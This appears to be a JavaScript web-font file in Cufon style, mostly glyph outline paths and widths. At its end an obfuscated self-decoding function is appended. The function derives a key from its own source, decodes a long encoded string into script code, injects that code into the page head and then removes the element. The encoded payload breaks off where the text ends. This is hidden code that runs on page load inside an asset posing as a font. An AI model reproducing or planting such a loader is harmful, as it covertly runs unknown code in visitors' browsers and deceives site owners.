81,61,-134,132,-134v71,0,132,53,132,134xm247,-129v0,-66,-45,-111,-103,-111v-58,0,-103,45,-103,111v0,61,39,112,103,112v58,0,103,-46,103,-112xm188,-103r24,0v-6,34,-31,56,-63,56v-46,0,-77,-36,-77,-82v0,-83,130,-109,140,-23r-24,0v-16,-55,-92,-30,-87,23v-8,56,76,81,87,26","w":288},{"d":"199,-73r-182,0r0,-36r182,0r0,36xm108,-139v-14,0,-26,-12,-26,-26v0,-14,12,-26,26,-26v14,0,26,12,26,26v0,13,-12,26,-26,26xm108,9v-14,0,-26,-12,-26,-26v0,-14,12,-26,26,-26v14,0,26,12,26,26v0,13,-12,26,-26,26","w":216},{"d":"22,-156r0,-20v15,-5,22,-17,22,-32r-22,0r0,-49r45,0v3,52,-2,92,-45,101xm93,-156r0,-20v15,-5,22,-17,22,-32r-22,0r0,-49r45,0v3,52,-2,92,-45,101","w":159},{"d":"-3,0r99,-257r7,0v-29,-15,-14,-62,18,-62v32,0,45,48,17,62r6,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm121,-305v-29,0,-23,39,0,39v11,0,19,-9,19,-19v0,-10,-8,-20,-19,-20","w":240},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50"},{"d":"-3,-263r34,0v63,88,70,237,0,332r-34,0v58,-99,59,-233,0,-332","w":100},{"d":"114,-27v72,0,67,-133,0,-132v-35,0,-52,26,-52,66v0,37,19,66,52,66xm23,0r0,-257r41,0r0,95v11,-18,35,-29,56,-29v59,0,87,45,87,99v0,50,-25,97,-80,97v-25,0,-53,-7,-65,-31r0,26r-39,0","w":219},{"d":"252,-135r0,135r-29,0r-7,-30v-73,86,-201,7,-201,-99v0,-73,47,-134,124,-134v56,0,103,30,110,88r-44,0v-4,-34,-34,-51,-66,-51v-55,0,-79,48,-79,97v0,49,24,98,79,98v46,0,71,-26,72,-70r-69,0r0,-34r110,0xm121,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":273},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99","w":259},{"d":"103,-32v67,0,69,-128,0,-127v-67,1,-66,127,0,127xm194,-186r0,176v0,56,-33,84,-92,84v-37,0,-79,-14,-83,-58r41,0v5,23,24,27,45,27v44,0,53,-34,47,-76v-12,21,-33,33,-56,33v-59,0,-83,-45,-83,-98v0,-77,97,-128,140,-63r0,-25r41,0","w":213},{"d":"12,-60r41,0v2,24,20,33,42,33v15,0,42,-4,41,-25v-1,-22,-31,-24,-61,-31v-30,-6,-60,-17,-60,-55v0,-76,151,-71,156,4r-43,0v-4,-19,-20,-25,-38,-25v-12,0,-33,3,-33,19v0,20,30,23,60,30v30,7,60,18,60,55v0,44,-44,60,-83,60v-47,0,-81,-21,-82,-65","w":186},{"d":"64,0r-41,0r0,-186r41,0r0,186xm57,-255r41,0r0,39r-41,0r0,-39xm29,-216r-41,0r0,-39r41,0r0,39","w":86},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0","w":206},{"d":"47,-192r-40,-14r8,-23r39,15r0,-43r25,0r0,43r39,-15r9,23r-41,14r25,34r-19,14r-26,-36r-24,36r-20,-14","w":133},{"d":"19,-178r0,-32v35,0,68,-12,74,-42r33,0r0,252r-45,0r0,-178r-62,0"},{"d":"15,-154r0,-32r151,0r0,29r-106,125r112,0r0,32r-164,0r0,-29r103,-125r-96,0","w":180},{"d":"72,-220r0,183r45,0v71,0,85,-41,85,-92v0,-51,-14,-91,-85,-91r-45,0xm27,0r0,-257r107,0v79,0,113,57,113,128v0,71,-34,129,-113,129r-107,0","w":259},{"d":"202,-98r44,0v-4,61,-46,103,-107,104r-11,16v20,-4,42,3,42,25v0,38,-52,38,-80,25r6,-14v15,6,45,12,45,-9v0,-15,-20,-18,-30,-10r-8,-7r20,-27v-68,-7,-109,-65,-109,-134v0,-73,46,-134,123,-134v58,0,104,33,109,88r-45,0v-8,-30,-27,-51,-64,-51v-55,0,-78,48,-78,97v0,49,23,98,78,98v40,0,61,-30,65,-67","w":259},{"d":"23,0r0,-257r41,0r0,146r74,-75r50,0r-71,68r78,118r-50,0r-57,-90r-24,23r0,67r-41,0","w":193},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm111,-312v28,0,58,30,70,-3r20,0v-4,23,-13,42,-40,42v-21,1,-60,-31,-67,1r-20,0v3,-18,15,-40,37,-40","w":273},{"d":"35,0r0,-49r50,0r0,49r-50,0xm155,0r0,-49r50,0r0,49r-50,0xm275,0r0,-49r50,0r0,49r-50,0","w":360},{"d":"27,0r0,-257r45,0r0,117r115,-117r55,0r-102,103r109,154r-56,0r-84,-123r-37,37r0,86r-45,0xm107,50r0,-37r37,0v3,41,-1,74,-36,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":246},{"d":"26,0r0,-257r47,0r118,189r0,-189r43,0r0,257r-48,0r-118,-189r0,189r-42,0xm190,-310r-39,39r-44,0r-39,-39r36,0r25,22r25,-22r36,0","w":259},{"d":"90,-137r0,-45r36,0r0,45r73,0r0,37r-73,0r0,45r-36,0r0,-45r-73,0r0,-37r73,0xm17,0r0,-37r182,0r0,37r-182,0","w":216},{"d":"22,-162r55,44r0,40r-55,45r0,-38r34,-27r-34,-27r0,-37xm93,-162r56,44r0,40r-56,45r0,-38r34,-27r-34,-27r0,-37","w":166},{"d":"3,-156r0,-30r31,0r0,-56r41,0r0,56r37,0r0,30r-37,0r0,100v-4,25,15,27,37,24r0,32v-44,8,-78,-4,-78,-46r0,-110r-31,0xm120,-221r0,-36r38,0v3,41,-3,73,-37,79r0,-16v12,-3,18,-15,18,-27r-19,0","w":148},{"d":"125,-210v0,46,-68,57,-81,87r77,0r0,25r-113,0v-6,-61,85,-66,85,-112v0,-15,-12,-22,-26,-22v-19,0,-25,17,-26,34r-32,0v0,-36,23,-59,59,-59v30,0,57,14,57,47","w":129},{"d":"109,-233v-15,0,-28,12,-28,29v0,17,15,30,24,43v15,-10,30,-21,30,-42v0,-17,-10,-30,-26,-30xm143,-56r-51,-63v-15,9,-39,17,-39,48v0,28,17,44,41,44v30,0,41,-19,49,-29xm188,0r-23,-29v-40,58,-153,40,-153,-42v0,-36,29,-60,59,-75v-13,-17,-26,-34,-26,-56v0,-37,28,-61,63,-61v33,0,64,20,64,61v0,30,-22,53,-47,66r40,48v3,-8,6,-18,8,-35r36,0v-3,22,-8,45,-20,63r49,60r-50,0","w":233},{"d":"114,-27v72,0,67,-133,0,-132v-35,0,-52,26,-52,66v0,37,19,66,52,66xm23,69r0,-255r39,0r0,25v12,-21,34,-30,58,-30v59,0,87,45,87,99v0,50,-25,97,-80,97v-24,0,-50,-8,-63,-29r0,93r-41,0","w":219},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm132,-252v-18,0,-34,-15,-34,-33v0,-18,16,-34,34,-34v18,0,33,16,33,34v0,18,-15,33,-33,33xm132,-305v-29,0,-23,39,0,39v11,0,20,-9,20,-19v0,-10,-9,-20,-20,-20","w":259},{"d":"175,-109r94,0v0,-30,-17,-50,-47,-50v-29,0,-45,23,-47,50xm136,-93v-21,16,-88,0,-83,42v5,42,86,26,83,-14r0,-28xm268,-59r41,0v-12,68,-116,88,-153,30v-29,48,-143,50,-144,-20v0,-46,36,-53,71,-58v30,-4,54,-3,54,-27v0,-21,-20,-25,-37,-25v-23,0,-39,10,-41,30r-41,0v3,-48,44,-62,84,-62v23,0,49,3,63,25v14,-18,37,-25,59,-25v63,0,90,47,86,109r-135,0v0,28,15,55,49,55v22,0,37,-13,44,-32","w":320},{"d":"94,0r0,-101r-96,-156r52,0r68,115r67,-115r50,0r-96,156r0,101r-45,0xm98,-271r33,-39r50,0r-51,39r-32,0","w":233},{"d":"27,0r0,-114r-24,0r0,-37r24,0r0,-106r107,0v79,0,113,57,113,128v0,71,-34,129,-113,129r-107,0xm72,-220r0,69r71,0r0,37r-71,0r0,77r45,0v71,0,85,-41,85,-92v0,-51,-14,-91,-85,-91r-45,0","w":259},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0","w":240},{"d":"23,0r0,-186r41,0r0,186v-28,14,-36,35,-36,45v2,20,24,19,34,4r14,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,0,-23,39,-46r-18,0xm23,-218r0,-39r41,0r0,39r-41,0","w":86},{"d":"58,-255r41,0r0,39r-41,0r0,-39xm30,-216r-42,0r0,-39r42,0r0,39","w":86},{"d":"27,0r0,-257r45,0r0,257r-45,0","w":100},{"d":"23,14r0,-200r41,0r0,202v3,44,-28,65,-72,56r0,-32v21,4,31,-1,31,-26xm23,-218r0,-39r41,0r0,39r-41,0","w":86},{"d":"3,-218r0,-39r208,0r0,39r-82,0r0,218r-45,0r0,-218r-81,0","w":213},{"d":"17,-34r134,-57r-134,-57r0,-37r182,81r0,26r-182,81r0,-37","w":216},{"d":"90,-109r0,-73r36,0r0,73r73,0r0,36r-73,0r0,73r-36,0r0,-73r-73,0r0,-36r73,0","w":216},{"d":"177,-137r0,96v-1,15,8,15,20,13r0,28v-5,2,-16,4,-23,5v-21,17,-26,29,-26,40v0,20,24,20,33,4r14,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,1,-21,35,-43v-8,-3,-14,-10,-16,-21v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30"},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm81,-255v28,0,58,32,69,-2r21,0v-4,23,-14,40,-40,41v-22,1,-60,-30,-67,2r-20,0v3,-18,15,-41,37,-41","w":213},{"d":"100,-29v36,0,46,-44,46,-97v0,-53,-10,-97,-46,-97v-36,0,-46,44,-46,97v0,53,10,97,46,97xm100,-257v72,0,87,74,87,131v0,57,-15,131,-87,131v-72,0,-87,-74,-87,-131v0,-57,15,-131,87,-131"},{"d":"27,0r0,-257r45,0r0,117r115,-117r55,0r-102,103r109,154r-56,0r-84,-123r-37,37r0,86r-45,0","w":246},{"d":"27,0r0,-257r45,0r0,257r-45,0xm70,-281r-41,0r0,-39r41,0r0,39","w":100},{"d":"26,0r0,-257r47,0r118,189r0,-189r43,0r0,257r-48,0r-118,-189r0,189r-42,0xm109,-271r32,-39r51,0r-51,39r-32,0","w":259},{"d":"12,-86r45,0v0,40,29,55,65,55v62,0,67,-56,33,-70v-18,-8,-42,-11,-77,-21v-44,-12,-56,-39,-56,-66v0,-51,48,-75,94,-75v54,0,98,28,98,82r-45,0v-2,-33,-24,-45,-55,-45v-21,0,-47,7,-47,33v0,44,65,38,104,53v33,12,50,38,50,65v0,58,-51,81,-102,81v-59,0,-106,-28,-107,-92xm96,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":233},{"d":"49,9r151,-270r28,0r-150,270r-29,0xm13,-208r0,-21v24,0,46,-7,50,-25r25,0r0,156r-31,0r0,-110r-44,0xm287,-112v0,46,-67,57,-80,87r77,0r0,25r-114,0v-4,-67,86,-61,86,-111v0,-15,-11,-24,-26,-24v-20,0,-26,18,-27,35r-31,0v0,-37,21,-61,59,-61v31,0,56,16,56,49","w":300},{"d":"20,-218r0,-39r195,0r0,34r-149,184r153,0r0,39r-211,0r0,-37r150,-181r-138,0","w":226},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm151,-309r41,0r0,39r-41,0r0,-39xm123,-270r-41,0r0,-39r41,0r0,39","w":273},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0","w":226},{"d":"22,0r0,-186r38,0v1,8,-3,22,2,26v16,-37,93,-45,109,0v27,-46,121,-45,121,31r0,129r-41,0r0,-109v0,-30,-2,-50,-34,-50v-63,1,-34,101,-40,159r-41,0r0,-120v0,-26,-8,-39,-33,-39v-57,0,-37,101,-40,159r-41,0","w":313},{"d":"0,-78r0,-39r360,0r0,39r-360,0","w":360},{"d":"72,-220r0,85v52,-3,111,15,111,-43v0,-60,-61,-38,-111,-42xm27,0r0,-257r114,0v73,0,87,48,87,80v0,32,-14,78,-87,78r-69,0r0,99r-45,0","w":240},{"d":"178,-103r0,27r-34,0r-11,76r-29,0r11,-76r-40,0r-11,76r-28,0r10,-76r-34,0r0,-27r38,0r7,-46r-34,0r0,-27r37,0r11,-76r29,0r-11,76r40,0r10,-76r29,0r-10,76r31,0r0,27r-35,0r-6,46r30,0xm125,-149r-40,0r-6,46r40,0"},{"d":"106,-159v-71,1,-70,131,-1,132v37,0,52,-34,52,-66v0,-41,-19,-66,-51,-66xm197,-257r0,257r-39,0v-1,-8,2,-19,-1,-25v-11,21,-34,30,-57,30v-59,0,-87,-43,-87,-99v-2,-100,92,-123,143,-68r0,-95r41,0","w":219},{"d":"12,-60r41,0v2,24,20,33,42,33v15,0,42,-4,41,-25v-1,-22,-31,-24,-61,-31v-30,-6,-60,-17,-60,-55v0,-76,151,-71,156,4r-43,0v-4,-19,-20,-25,-38,-25v-12,0,-33,3,-33,19v0,20,30,23,60,30v30,7,60,18,60,55v0,44,-44,60,-83,60v-47,0,-81,-21,-82,-65xm73,-212r32,-51r49,0r-51,51r-30,0","w":186},{"d":"64,0r-41,0r0,-186r41,0r0,186xm95,-223r-103,0r0,-23r103,0r0,23","w":86},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm80,-212r32,-51r49,0r-52,51r-29,0"},{"d":"27,-98r0,-159r45,0r0,126r72,-51r0,34r-72,51r0,58r131,0r0,39r-176,0r0,-66r-27,20r0,-32","w":206},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm121,-255r41,0r0,39r-41,0r0,-39xm93,-216r-41,0r0,-39r41,0r0,39","w":213},{"d":"12,-60r41,0v2,24,20,33,42,33v15,0,42,-4,41,-25v-1,-22,-31,-24,-61,-31v-30,-6,-60,-17,-60,-55v0,-76,151,-71,156,4r-43,0v-4,-19,-20,-25,-38,-25v-12,0,-33,3,-33,19v0,20,30,23,60,30v30,7,60,18,60,55v0,44,-44,60,-83,60v-47,0,-81,-21,-82,-65xm73,50r0,-37r38,0v3,41,-1,74,-36,79r0,-16v12,-3,17,-14,17,-26r-19,0","w":186},{"d":"15,-154r0,-32r151,0r0,29r-106,125r112,0r0,32r-164,0r0,-29r103,-125r-96,0xm69,-212r33,-51r48,0r-51,51r-30,0","w":180},{"d":"252,-135r0,135r-29,0r-7,-30v-73,86,-201,7,-201,-99v0,-73,47,-134,124,-134v56,0,103,30,110,88r-44,0v-4,-34,-34,-51,-66,-51v-55,0,-79,48,-79,97v0,49,24,98,79,98v46,0,71,-26,72,-70r-69,0r0,-34r110,0","w":273},{"d":"74,-33r-56,-45r0,-40r56,-44r0,37r-34,27r34,27r0,38xm145,-33r-56,-45r0,-40r56,-44r0,37r-34,27r34,27r0,38","w":166},{"d":"252,-135r0,135r-29,0r-7,-30v-73,86,-201,7,-201,-99v0,-73,47,-134,124,-134v56,0,103,30,110,88r-44,0v-4,-34,-34,-51,-66,-51v-55,0,-79,48,-79,97v0,49,24,98,79,98v46,0,71,-26,72,-70r-69,0r0,-34r110,0xm83,-316r21,0v6,34,69,33,75,0r20,0v-4,30,-27,46,-60,46v-33,0,-53,-16,-56,-46","w":273},{"d":"50,72r6,-14v15,6,46,12,46,-9v0,-14,-21,-18,-31,-10r-8,-7r20,-27v-41,-3,-70,-24,-71,-65r41,0v2,24,20,33,42,33v15,0,42,-4,41,-25v-1,-22,-31,-24,-61,-31v-30,-6,-60,-17,-60,-55v0,-76,151,-71,156,4r-43,0v-4,-19,-20,-25,-38,-25v-12,0,-33,3,-33,19v0,20,30,23,60,30v30,7,60,18,60,55v0,42,-40,59,-77,60v-4,6,-9,10,-12,17v20,-4,42,3,42,25v0,38,-52,38,-80,25","w":186},{"d":"100,5v-51,0,-89,-30,-89,-79v0,-32,18,-55,46,-62v-63,-26,-36,-130,43,-121v79,-9,108,94,43,121v82,25,44,141,-43,141xm100,-27v27,0,48,-17,48,-47v0,-28,-21,-44,-48,-44v-27,0,-48,16,-48,44v0,30,21,47,48,47xm100,-225v-22,0,-40,14,-40,39v0,24,17,37,40,37v23,0,40,-13,40,-37v0,-25,-18,-39,-40,-39"},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm112,-271r33,-39r50,0r-51,39r-32,0","w":273},{"d":"97,-223v-30,0,-44,25,-44,52v0,27,14,53,44,53v31,0,46,-25,46,-53v0,-27,-15,-52,-46,-52xm17,-64r41,0v2,21,16,35,37,35v44,1,51,-56,51,-87v-37,60,-134,23,-134,-55v0,-49,32,-86,87,-86v71,0,89,59,89,132v0,60,-24,130,-95,130v-40,0,-74,-28,-76,-69"},{"d":"246,-175r-45,0v-8,-30,-27,-51,-64,-51v-55,0,-78,48,-78,97v0,49,23,98,78,98v40,0,61,-30,65,-67r44,0v-4,62,-47,104,-109,104v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134v58,0,104,33,109,88","w":259},{"d":"71,0r-68,-186r45,0r48,143r45,-143r43,0r-67,186r-46,0","w":186},{"d":"17,-114r27,-138r131,0r0,37r-100,0v-3,21,-12,45,-12,65v46,-47,125,-4,125,65v0,40,-25,90,-87,90v-49,0,-86,-27,-88,-77r41,0v3,27,19,43,46,43v35,0,47,-25,47,-56v0,-49,-69,-74,-89,-29r-41,0"},{"d":"67,-257r0,21v-14,5,-22,17,-22,32r22,0r0,48r-45,0v-4,-52,2,-92,45,-101xm138,-257r0,21v-14,5,-22,17,-22,32r22,0r0,48r-45,0v-4,-52,2,-92,45,-101","w":159},{"d":"154,-82v0,-30,-61,-47,-85,-64v-25,11,-35,38,-2,57r65,37v13,-5,22,-15,22,-30xm133,12v0,-54,-125,-59,-125,-124v0,-27,15,-44,39,-54v-40,-38,4,-97,55,-97v41,0,73,26,73,68r-39,0v4,-40,-61,-50,-64,-9v6,49,121,53,121,118v0,23,-18,45,-39,52v13,11,20,24,20,46v0,41,-34,62,-71,62v-44,0,-77,-26,-78,-74r39,0v-5,44,69,60,69,12"},{"d":"27,0r0,-257r45,0r0,218r131,0r0,39r-176,0xm91,-221r0,-36r37,0v3,41,-2,73,-36,79r0,-16v12,-3,17,-15,17,-27r-18,0","w":206},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-8,35,-34,56,-67,62v-22,18,-27,29,-27,41v0,20,24,20,33,4r14,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,0,-20,31,-41v-55,-3,-85,-43,-85,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50"},{"d":"-8,6r103,-269r40,0r-104,269r-39,0","w":126},{"d":"18,-203v0,-30,24,-54,54,-54v30,0,54,24,54,54v0,30,-24,54,-54,54v-30,0,-54,-24,-54,-54xm38,-203v0,19,15,34,34,34v19,0,34,-15,34,-34v0,-19,-15,-34,-34,-34v-19,0,-34,15,-34,34","w":144},{"d":"3,-156r0,-30r31,0r0,-56r41,0r0,56r37,0r0,30r-37,0r0,100v-4,25,15,27,37,24r0,32v-44,8,-78,-4,-78,-46r0,-110r-31,0","w":119},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm48,-263r48,0r33,51r-30,0","w":206},{"d":"180,45r-180,0r0,-18r180,0r0,18","w":180},{"d":"72,-1r-71,-185r45,0r49,139r48,-139r42,0r-72,196v-12,42,-37,74,-94,62r0,-35v33,12,49,-11,53,-38","w":186},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm167,-271r-33,-39r-50,0r51,39r32,0","w":273},{"d":"22,0r0,-186r38,0v1,9,-2,21,1,28v27,-52,124,-42,124,30r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0xm162,-263r-39,51r-40,0r-39,-51r33,0r26,32r25,-32r34,0","w":206},{"d":"50,-81v-39,0,-32,-55,0,-54v14,0,27,12,27,26v0,14,-12,28,-27,28","w":100},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm143,-271r-32,-39r-51,0r51,39r32,0","w":240},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm174,-276r-103,0r0,-23r103,0r0,23","w":226},{"d":"1,0r71,-98r-65,-88r50,0r39,57r40,-57r48,0r-63,86r71,100r-49,0r-48,-69r-45,69r-49,0","w":193},{"d":"27,0r0,-257r45,0r0,218r131,0r0,39r-176,0xm38,-271r33,-39r50,0r-51,39r-32,0","w":206},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm146,-281r-41,0r0,-39r41,0r0,39","w":226},{"d":"31,-263r104,269r-40,0r-103,-269r39,0","w":126},{"w":100},{"d":"72,-220r0,80v50,-2,120,14,118,-41v-2,-60,-68,-33,-118,-39xm27,0r0,-257r123,0v56,0,85,25,85,69v0,50,-35,60,-42,66v15,2,38,13,38,54v0,30,4,58,14,68r-48,0v-15,-44,4,-106,-58,-106r-67,0r0,106r-45,0","w":253},{"d":"108,-113r0,32v-10,0,-34,5,-34,26r0,74v-7,48,-35,53,-79,50r0,-33v24,4,44,-5,40,-25r0,-70v-1,-30,28,-35,38,-39v-12,-1,-38,-5,-38,-40v0,-40,23,-102,-40,-93r0,-32v44,-2,79,0,79,49r0,71v0,23,24,30,34,30","w":106},{"d":"108,-150v-38,0,-52,29,-52,62v0,33,15,61,48,61v66,2,73,-122,4,-123xm70,-195r-18,-17r34,-17v-11,-5,-21,-9,-30,-12r27,-22v13,4,26,10,38,18r37,-18r18,17r-34,17v79,55,84,232,-41,234v-55,0,-86,-40,-86,-96v0,-69,74,-118,133,-75v-8,-19,-24,-34,-39,-47","w":213},{"d":"62,0r-57,-186r43,0r37,139r35,-139r42,0r34,139r38,-139r41,0r-58,186r-42,0r-35,-138r-35,138r-43,0","w":280},{"d":"64,0r-41,0r0,-186r41,0r0,186xm-15,-211r38,-52r40,0r39,52r-33,0r-25,-32r-26,32r-33,0","w":86},{"d":"141,-257r0,23r-46,0r0,125r-28,0r0,-125r-46,0r0,-23r120,0xm213,-257r40,105r41,-105r41,0r0,148r-27,0r-1,-116r-44,116r-20,0r-45,-116r0,116r-27,0r0,-148r42,0","w":356},{"d":"0,-78r0,-39r180,0r0,39r-180,0","w":180},{"d":"42,-127r5,-31r33,0v7,-60,25,-122,101,-103r-6,32v-46,-15,-46,37,-53,71r36,0r-5,31r-37,0r-26,137v-7,37,-44,59,-90,49r5,-32v20,3,39,5,43,-18r27,-136r-33,0"},{"d":"40,-72v-7,-59,-15,-117,-12,-185r45,0v2,68,-5,126,-12,185r-21,0xm26,0r0,-45r48,0r0,45r-48,0","w":100},{"d":"188,-124r-41,0v-3,-23,-19,-35,-42,-35v-21,0,-51,11,-51,68v0,31,13,64,49,64v24,0,40,-16,44,-43r41,0v-8,48,-37,75,-85,75v-58,0,-90,-41,-90,-96v0,-56,30,-100,91,-100v43,0,80,21,84,67"},{"d":"106,-159v-71,1,-70,131,-1,132v37,0,52,-34,52,-66v0,-41,-19,-66,-51,-66xm197,-257r0,257r-39,0v-1,-8,2,-19,-1,-25v-11,21,-34,30,-57,30v-59,0,-87,-43,-87,-99v-2,-100,92,-123,143,-68r0,-95r41,0xm215,-221r0,-36r37,0v3,41,-2,73,-36,79r0,-16v12,-3,17,-15,17,-27r-18,0","w":241},{"d":"18,-78r0,-39r104,0r0,39r-104,0","w":140},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm123,-216r-41,0r0,-39r41,0r0,39"},{"d":"3,-218r0,-39r208,0r0,39r-82,0r0,218r-45,0r0,-218r-81,0xm168,-310r-39,39r-44,0r-38,-39r35,0r25,22r26,-22r35,0","w":213},{"d":"70,0r-68,-257r46,0r47,197r52,-197r46,0r51,197r48,-197r46,0r-71,257r-46,0r-52,-197r-53,197r-46,0","w":339},{"d":"15,-154r0,-32r151,0r0,29r-106,125r112,0r0,32r-164,0r0,-29r103,-125r-96,0xm112,-216r-41,0r0,-39r41,0r0,39","w":180},{"d":"12,-86r45,0v0,40,29,55,65,55v62,0,67,-56,33,-70v-18,-8,-42,-11,-77,-21v-44,-12,-56,-39,-56,-66v0,-51,48,-75,94,-75v54,0,98,28,98,82r-45,0v-2,-33,-24,-45,-55,-45v-21,0,-47,7,-47,33v0,44,65,38,104,53v33,12,50,38,50,65v0,58,-51,81,-102,81v-59,0,-106,-28,-107,-92","w":233},{"d":"162,-39r0,-70r-145,0r0,-37r182,0r0,107r-37,0","w":216},{"d":"28,-156r0,-20v17,-2,22,-16,22,-32r-22,0r0,-49r45,0v2,51,2,96,-45,101","w":100},{"d":"27,0r0,-257r63,0r72,201r69,-201r62,0r0,257r-42,0r-1,-198r-71,198r-38,0r-72,-198r0,198r-42,0","w":320},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm42,-263r21,0v6,37,69,36,75,0r21,0v-4,34,-27,51,-60,51v-33,0,-54,-18,-57,-51"},{"d":"-3,0r99,-257r48,0r99,257r-10,0v-26,20,-33,33,-33,45v0,20,24,20,33,4r15,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,0,-23,39,-46r-18,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0","w":240}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+441-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("-JSoGBnDvr=P-$~f!BMg:J:=x;noSB=Px;QgvrV?Sd])NsDax}H|@Jd*x}H|@JQ*x}H|@JS~x}H|@J@0x}H|@,yox}H|@JSTx}H|@,>^uo0o@zb6@~)1x}H|@,H7x}H|@JH6x}H|@JdTGo0o@zb|No0o@z>~pd0o@z>^Sd0o@z>Tn~0o@zb|@M0o@z>*@M0o@z>TN~0o@zbo@d0o@zb|n~0o@z>T@o0o@zbopKhU!,w0n,QU!,w0@rMU!,w|SBSU!,w0nTQU!,w|Sz*U!,w0nzQU!,w|NrdU!,w|N;nU!,w|S,VU!,w|N;y^x}H|@JS^x}H|@JV*x}H|@J:;x}H|@JVax}H|@JHgx}H|@JyDx}H|@,SBx}H|@J@7x}H|@,>~x}H|@J